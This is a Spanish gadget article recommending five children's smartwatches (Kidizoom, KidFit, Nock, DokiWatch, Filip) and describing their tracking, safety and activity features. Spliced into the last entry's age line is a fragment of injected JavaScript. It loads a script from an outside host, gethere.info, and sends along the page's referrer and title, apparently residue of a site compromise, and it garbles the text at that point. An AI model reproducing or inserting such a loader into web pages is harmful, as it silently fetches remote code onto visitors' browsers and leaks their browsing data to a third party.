Cinco relojes ‘inteligentes’ para niños

Aquí te recomendamos cinco de estos gadgets para niños

A pesar de que los relojes inteligentes son utilizados normalmente por adultos o jóvenes que superan los 18 años, también existen gadgets de este tipo creados para vestir las muñecas de los más pequeños. Los relojes inteligentes para niños no sólo cuentan con aplicaciones para el ocio y juegos, también incluyen funciones que les ayudarán a adoptar hábitos saludables en su vida diaria, sirven como geolocalizadores o sistemas que envían alarmas en caso de que el niño necesite algún tipo de ayuda o se encuentre en una situación peligrosa.

Aquí te recomendamos cinco de estos gadgets para niños que cumplen con algunas de las funciones mencionadas, si estás pensando en regalarle uno a tu hijo, considera estas opciones.

Kidizoom Smartwatch

1

Este dispositivo con pantalla táctil además de dar la hora, cuenta con las siguientes funciones: cámara de fotos, videocámara, retoque de fotos, juegos, grabadora con distorsionador de voz, temporizador, cronómetro y alarma. Este equipo no necesita conectarse con algún teléfono inteligente para funcionar pero cuenta con cable USB para transferir los archivos de imagen, video y audio a una computadora.
Edad recomendada: Niños de entre 4 y 9 años.

 

KidFit

2

Este es un reloj que te será muy útil si buscas que tus hijos desarrollen un estilo de vida saludable a través del ejercicio. KidFit monitoriza la actividad diaria de los pequeños y sus horas de sueño, utiliza los datos recabados para crear objetivos para ellos ¿Qué quiere decir esto? A través de una app, KidFit animará a los niños a realizar deporte físico o a jugar durante determinado tiempo pero cuando sea el momento, también les dirá que es hora de descansar; este gadget buscará mantener un equilibrio entre las horas de actividad y descanso que deben tener los niños. Es resistente al agua y su batería proporciona una autonomía de hasta siete días, como utiliza una aplicación debe sincronizarse con un smartphone con sistema iOS o Android.

Edad recomendada: Niños de entre 5 y 13 años

 

Nock

3

¡Con este reloj sabrás la ubicación de tus hijos todo el tiempo!

Además de ser un localizador (cuenta con un GPS integrado para conocer todos los lugares que visita tu hijo a lo largo del día), con él los más pequeños podrán hacer y recibir llamadas de manera sencilla pero no sólo eso, es posible configurar una zona de seguridad preconfigurada en el reloj; si el menor sale de la misma serás notificado inmediatamente. También cuenta con un botón SOS que el niño puede utilizar en cualquier momento.

Debe sincronizarse con un smartphone con sistema iOS o Android.
Edad recomendada: De los 5 a 12 años

 

DokiWatch

4

DokiWatch tiene un concepto llamativo ya que incorpora varias características que normalmente no tienen los relojes inteligentes para niños; es un smartwatch con Android y pantalla táctil de 1.22 pulgadas, ranura para microSIM, sistema de localización y conectividad WiFi y 3G, así como 512MB de RAM, 4GB de almacenamiento, una batería de 600mAh y resistencia al agua. Pero esto no es todo, también incorpora una cámara de 2 megapixeles para hacer videollamadas.

Los papás tendrán que instalar la app Doki en sus dispositivos móviles para poder saber en todo momento dónde están sus hijos y mantenerse en contacto a través de video, voz y texto, delimitar zonas determinadas para recibir avisos cuando los más pequeños lleguen o abandonen un lugar y una mascota virtual que motivará a los niños a caminar un determinado número de pasos al día.
Edad recomendada: niños de 8 a 15 años

Filip

l Filip es un dispositivo que funciona a partir de una app instalada en un smartphone, lo primero que tendrás que hacer para utilizarlo es crear cinco contactos de confianza, el niño que use el reloj podrá contestar llamadas y recibir mensajes de esos cinco números; al igual que el dispositivo pasado, este reloj envía alarmas de forma automática cuando el niño abandona una zona de seguridad predefinida y cuenta con un botón rojo que permite hacer llamadas de emergencia que entregan al destinatario una grabación del sonido ambiente y la geolocalización del usuario.

Edad recomendada: Niños de entre 4 y 11 añoss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado